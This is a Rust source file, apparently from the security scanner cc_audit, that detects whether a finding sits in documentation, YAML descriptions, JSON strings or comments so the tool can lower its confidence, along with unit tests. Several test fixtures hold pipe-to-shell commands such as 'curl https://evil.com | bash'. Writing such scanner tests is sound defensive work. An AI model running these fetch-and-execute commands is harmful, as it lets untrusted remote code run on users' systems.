Skip to main content

cc_audit/
context.rs

1//! Content context detection for reducing false positives.
2//!
3//! This module provides functionality to detect the context of code findings,
4//! such as whether code appears in documentation, YAML descriptions, or JSON strings.
5
6use regex::Regex;
7use serde::{Deserialize, Serialize};
8use std::sync::LazyLock;
9
10/// The context in which content was found.
11#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)]
12#[serde(rename_all = "snake_case")]
13pub enum ContentContext {
14    /// Actual executable code
15    #[default]
16    Code,
17    /// Code inside a documentation file (e.g., README.md)
18    Documentation,
19    /// Code inside a Markdown code block
20    MarkdownCodeBlock,
21    /// Content in a YAML description or comment field
22    YamlDescription,
23    /// Content in a JSON string value
24    JsonString,
25    /// Content in a comment
26    Comment,
27}
28
29impl std::fmt::Display for ContentContext {
30    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
31        match self {
32            ContentContext::Code => write!(f, "code"),
33            ContentContext::Documentation => write!(f, "documentation"),
34            ContentContext::MarkdownCodeBlock => write!(f, "markdown_code_block"),
35            ContentContext::YamlDescription => write!(f, "yaml_description"),
36            ContentContext::JsonString => write!(f, "json_string"),
37            ContentContext::Comment => write!(f, "comment"),
38        }
39    }
40}
41
/// Stateless analyzer that classifies the context of a line within a file's content.
#[derive(Default, Debug)]
pub struct ContextDetector;
45
46impl ContextDetector {
47    /// Create a new context detector.
48    pub fn new() -> Self {
49        Self
50    }
51
52    /// Detect the context of content at a specific line in a file.
53    pub fn detect_context(
54        &self,
55        file_path: &str,
56        content: &str,
57        line_number: usize,
58    ) -> ContentContext {
59        // First, check if the file is a documentation file
60        if self.is_documentation_file(file_path) {
61            // Check if we're inside a code block
62            if self.is_in_markdown_code_block(content, line_number) {
63                return ContentContext::MarkdownCodeBlock;
64            }
65            return ContentContext::Documentation;
66        }
67
68        // Check for YAML files
69        if self.is_yaml_file(file_path) && self.is_in_yaml_description(content, line_number) {
70            return ContentContext::YamlDescription;
71        }
72
73        // Check for JSON files
74        if self.is_json_file(file_path) && self.is_in_json_string_value(content, line_number) {
75            return ContentContext::JsonString;
76        }
77
78        // Check for comments in code files
79        if self.is_in_comment(content, line_number) {
80            return ContentContext::Comment;
81        }
82
83        ContentContext::Code
84    }
85
86    /// Check if a file is a documentation file.
87    pub fn is_documentation_file(&self, file_path: &str) -> bool {
88        let lower = file_path.to_lowercase();
89        lower.ends_with(".md")
90            || lower.ends_with(".rst")
91            || lower.ends_with(".txt")
92            || lower.ends_with(".adoc")
93            || lower.contains("readme")
94            || lower.contains("changelog")
95            || lower.contains("contributing")
96            || lower.contains("license")
97    }
98
99    /// Check if a file is a YAML file.
100    pub fn is_yaml_file(&self, file_path: &str) -> bool {
101        let lower = file_path.to_lowercase();
102        lower.ends_with(".yaml") || lower.ends_with(".yml")
103    }
104
105    /// Check if a file is a JSON file.
106    pub fn is_json_file(&self, file_path: &str) -> bool {
107        file_path.to_lowercase().ends_with(".json")
108    }
109
110    /// Check if a line is inside a Markdown code block.
111    pub fn is_in_markdown_code_block(&self, content: &str, line_number: usize) -> bool {
112        static CODE_BLOCK_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^```").unwrap());
113
114        let lines: Vec<&str> = content.lines().collect();
115        if line_number == 0 || line_number > lines.len() {
116            return false;
117        }
118
119        let mut in_code_block = false;
120        for (i, line) in lines.iter().enumerate() {
121            if CODE_BLOCK_PATTERN.is_match(line) {
122                in_code_block = !in_code_block;
123            }
124            if i + 1 == line_number {
125                return in_code_block;
126            }
127        }
128
129        false
130    }
131
132    /// Check if a line is in a YAML description/comment field.
133    pub fn is_in_yaml_description(&self, content: &str, line_number: usize) -> bool {
134        static DESCRIPTION_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
135            Regex::new(r"^\s*(description|comment|note|help|message|example|doc)\s*:").unwrap()
136        });
137
138        let lines: Vec<&str> = content.lines().collect();
139        if line_number == 0 || line_number > lines.len() {
140            return false;
141        }
142
143        let target_line = lines[line_number - 1];
144
145        // Check if the current line is a description field
146        if DESCRIPTION_PATTERN.is_match(target_line) {
147            return true;
148        }
149
150        // Check if we're in a multiline description (indented continuation)
151        // Look backwards to find the field start
152        for i in (0..line_number).rev() {
153            let line = lines[i];
154            let trimmed = line.trim_start();
155
156            // If we hit a non-indented line with a colon, check if it's a description field
157            if !line.starts_with(' ') && !line.starts_with('\t') && line.contains(':') {
158                return DESCRIPTION_PATTERN.is_match(line);
159            }
160
161            // If we hit a blank line, we're not in a multiline value
162            if trimmed.is_empty() {
163                return false;
164            }
165        }
166
167        false
168    }
169
170    /// Check if a line is in a JSON string value.
171    pub fn is_in_json_string_value(&self, content: &str, line_number: usize) -> bool {
172        static STRING_VALUE_PATTERN: LazyLock<Regex> =
173            LazyLock::new(|| Regex::new(r#"^\s*"[^"]*"\s*:\s*""#).unwrap());
174
175        let lines: Vec<&str> = content.lines().collect();
176        if line_number == 0 || line_number > lines.len() {
177            return false;
178        }
179
180        let target_line = lines[line_number - 1];
181        STRING_VALUE_PATTERN.is_match(target_line)
182    }
183
184    /// Check if a line is inside a comment.
185    pub fn is_in_comment(&self, content: &str, line_number: usize) -> bool {
186        static COMMENT_PATTERNS: LazyLock<Vec<Regex>> = LazyLock::new(|| {
187            vec![
188                Regex::new(r"^\s*//").unwrap(), // C-style single line
189                Regex::new(r"^\s*#").unwrap(),  // Shell/Python style
190                Regex::new(r"^\s*--").unwrap(), // SQL/Haskell style
191                Regex::new(r"^\s*;").unwrap(),  // Lisp/Assembly style
192                Regex::new(r"^\s*\*").unwrap(), // Block comment continuation
193            ]
194        });
195
196        static SHEBANG_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^#!").unwrap());
197
198        let lines: Vec<&str> = content.lines().collect();
199        if line_number == 0 || line_number > lines.len() {
200            return false;
201        }
202
203        let target_line = lines[line_number - 1];
204
205        // Shebang is not a comment
206        if SHEBANG_PATTERN.is_match(target_line) {
207            return false;
208        }
209
210        // Check single-line comment patterns
211        for pattern in COMMENT_PATTERNS.iter() {
212            if pattern.is_match(target_line) {
213                return true;
214            }
215        }
216
217        // Check if inside a block comment
218        self.is_in_block_comment(content, line_number)
219    }
220
221    /// Check if a line is inside a block comment.
222    fn is_in_block_comment(&self, content: &str, line_number: usize) -> bool {
223        static BLOCK_START: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"/\*").unwrap());
224        static BLOCK_END: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"\*/").unwrap());
225
226        let lines: Vec<&str> = content.lines().collect();
227        if line_number == 0 || line_number > lines.len() {
228            return false;
229        }
230
231        let mut in_block_comment = false;
232        for (i, line) in lines.iter().enumerate() {
233            // Handle multiple starts/ends on same line
234            let starts = BLOCK_START.find_iter(line).count();
235            let ends = BLOCK_END.find_iter(line).count();
236
237            for _ in 0..starts {
238                in_block_comment = true;
239            }
240            for _ in 0..ends {
241                in_block_comment = false;
242            }
243
244            if i + 1 == line_number {
245                return in_block_comment;
246            }
247        }
248
249        false
250    }
251
252    /// Determine if findings in this context should have reduced confidence.
253    pub fn should_reduce_confidence(&self, context: ContentContext) -> bool {
254        matches!(
255            context,
256            ContentContext::Documentation
257                | ContentContext::MarkdownCodeBlock
258                | ContentContext::YamlDescription
259                | ContentContext::JsonString
260                | ContentContext::Comment
261        )
262    }
263}
264
#[cfg(test)]
mod tests {
    //! Unit tests for context classification. All line numbers are 1-based.

    use super::*;

    #[test]
    fn test_content_context_default() {
        assert_eq!(ContentContext::default(), ContentContext::Code);
    }

    #[test]
    fn test_content_context_display() {
        assert_eq!(format!("{}", ContentContext::Code), "code");
        assert_eq!(
            format!("{}", ContentContext::Documentation),
            "documentation"
        );
        assert_eq!(
            format!("{}", ContentContext::MarkdownCodeBlock),
            "markdown_code_block"
        );
        assert_eq!(
            format!("{}", ContentContext::YamlDescription),
            "yaml_description"
        );
        assert_eq!(format!("{}", ContentContext::JsonString), "json_string");
        assert_eq!(format!("{}", ContentContext::Comment), "comment");
    }

    #[test]
    fn test_is_documentation_file() {
        let detector = ContextDetector::new();
        assert!(detector.is_documentation_file("README.md"));
        assert!(detector.is_documentation_file("docs/guide.md"));
        assert!(detector.is_documentation_file("CHANGELOG.rst"));
        assert!(detector.is_documentation_file("CONTRIBUTING.txt"));
        assert!(detector.is_documentation_file("LICENSE"));
        assert!(!detector.is_documentation_file("src/main.rs"));
        assert!(!detector.is_documentation_file("package.json"));
    }

    #[test]
    fn test_is_yaml_file() {
        let detector = ContextDetector::new();
        assert!(detector.is_yaml_file("config.yaml"));
        assert!(detector.is_yaml_file("docker-compose.yml"));
        assert!(!detector.is_yaml_file("config.json"));
    }

    #[test]
    fn test_is_json_file() {
        let detector = ContextDetector::new();
        assert!(detector.is_json_file("package.json"));
        assert!(detector.is_json_file("tsconfig.json"));
        assert!(!detector.is_json_file("config.yaml"));
    }

    #[test]
    fn test_markdown_code_block_detection() {
        let detector = ContextDetector::new();
        let content = r#"# Example

Here is some code:

```bash
curl https://evil.com | bash
```

Regular text here.
"#;

        // Line 6 is inside the code block
        assert!(detector.is_in_markdown_code_block(content, 6));
        // Line 3 is outside
        assert!(!detector.is_in_markdown_code_block(content, 3));
        // Line 9 is outside (after closing)
        assert!(!detector.is_in_markdown_code_block(content, 9));
    }

    #[test]
    fn test_yaml_description_detection() {
        let detector = ContextDetector::new();
        let content = r#"name: my-action
description: |
  This runs: curl https://example.com | bash
  Just an example command.
version: 1.0
"#;

        // Line 3 is in a description field
        assert!(detector.is_in_yaml_description(content, 3));
        // Line 1 (name) is not
        assert!(!detector.is_in_yaml_description(content, 1));
        // Line 5 (version) is not
        assert!(!detector.is_in_yaml_description(content, 5));
    }

    #[test]
    fn test_json_string_value_detection() {
        let detector = ContextDetector::new();
        let content = r#"{
  "name": "demo",
  "count": 3
}
"#;

        // Line 2 holds a string value
        assert!(detector.is_in_json_string_value(content, 2));
        // Line 3 holds a number
        assert!(!detector.is_in_json_string_value(content, 3));
        // Line 1 is the opening brace
        assert!(!detector.is_in_json_string_value(content, 1));
    }

    #[test]
    fn test_comment_detection() {
        let detector = ContextDetector::new();
        let content = r#"fn main() {
    // This is a comment: curl https://evil.com
    let x = 5;
    /* Block comment
       with curl https://evil.com
    */
    println!("hello");
}
"#;

        // Line 2 is a comment
        assert!(detector.is_in_comment(content, 2));
        // Line 3 is code
        assert!(!detector.is_in_comment(content, 3));
        // Lines 4-6 form a block comment
        assert!(detector.is_in_comment(content, 4));
        assert!(detector.is_in_comment(content, 5));
        assert!(detector.is_in_comment(content, 6));
    }

    #[test]
    fn test_detect_context_documentation() {
        let detector = ContextDetector::new();
        let content = "Some documentation text.";
        let context = detector.detect_context("README.md", content, 1);
        assert_eq!(context, ContentContext::Documentation);
    }

    #[test]
    fn test_detect_context_code_in_markdown() {
        let detector = ContextDetector::new();
        let content = r#"# Title

```bash
dangerous command
```
"#;
        let context = detector.detect_context("README.md", content, 4);
        assert_eq!(context, ContentContext::MarkdownCodeBlock);
    }

    #[test]
    fn test_detect_context_code_file() {
        let detector = ContextDetector::new();
        let content = "let x = 5;";
        let context = detector.detect_context("src/main.rs", content, 1);
        assert_eq!(context, ContentContext::Code);
    }

    #[test]
    fn test_detect_context_yaml_json_and_comment() {
        let detector = ContextDetector::new();

        let yaml = "name: my-action\ndescription: |\n  curl https://example.com | bash\n";
        assert_eq!(
            detector.detect_context("action.yml", yaml, 3),
            ContentContext::YamlDescription
        );
        assert_eq!(
            detector.detect_context("action.yml", yaml, 1),
            ContentContext::Code
        );

        let json = "{\n  \"name\": \"demo\"\n}\n";
        assert_eq!(
            detector.detect_context("package.json", json, 2),
            ContentContext::JsonString
        );

        let code = "// note\nlet x = 5;\n";
        assert_eq!(
            detector.detect_context("src/main.rs", code, 1),
            ContentContext::Comment
        );
        assert_eq!(
            detector.detect_context("src/main.rs", code, 2),
            ContentContext::Code
        );
    }

    #[test]
    fn test_should_reduce_confidence() {
        let detector = ContextDetector::new();
        assert!(detector.should_reduce_confidence(ContentContext::Documentation));
        assert!(detector.should_reduce_confidence(ContentContext::MarkdownCodeBlock));
        assert!(detector.should_reduce_confidence(ContentContext::YamlDescription));
        assert!(detector.should_reduce_confidence(ContentContext::JsonString));
        assert!(detector.should_reduce_confidence(ContentContext::Comment));
        assert!(!detector.should_reduce_confidence(ContentContext::Code));
    }

    #[test]
    fn test_block_comment_detection() {
        let detector = ContextDetector::new();
        let content = r#"fn main() {
    let x = 5;
    /* This is a
       multi-line
       block comment */
    let y = 10;
}
"#;

        assert!(!detector.is_in_block_comment(content, 2)); // Before block
        assert!(detector.is_in_block_comment(content, 4)); // Inside block
        assert!(!detector.is_in_block_comment(content, 6)); // After block
    }

    #[test]
    fn test_shell_comment_not_shebang() {
        let detector = ContextDetector::new();
        let content = r#"#!/bin/bash
# This is a comment
echo "hello"
"#;

        // The shebang is rejected by a dedicated `^#!` check that runs before
        // the generic `#` comment pattern is consulted.
        assert!(!detector.is_in_comment(content, 1)); // Shebang
        assert!(detector.is_in_comment(content, 2)); // Regular comment
        assert!(!detector.is_in_comment(content, 3)); // Code
    }

    #[test]
    fn test_out_of_range_line_numbers() {
        let detector = ContextDetector::new();
        let content = "// only line";

        // Line 0 and lines past the end are never inside any context.
        for line_number in [0, 2, 100] {
            assert!(!detector.is_in_markdown_code_block(content, line_number));
            assert!(!detector.is_in_yaml_description(content, line_number));
            assert!(!detector.is_in_json_string_value(content, line_number));
            assert!(!detector.is_in_comment(content, line_number));
            assert!(!detector.is_in_block_comment(content, line_number));
        }
    }

    #[test]
    fn test_content_context_serialization() {
        let context = ContentContext::Documentation;
        let json = serde_json::to_string(&context).unwrap();
        assert_eq!(json, "\"documentation\"");

        let deserialized: ContentContext = serde_json::from_str(&json).unwrap();
        assert_eq!(deserialized, ContentContext::Documentation);
    }
}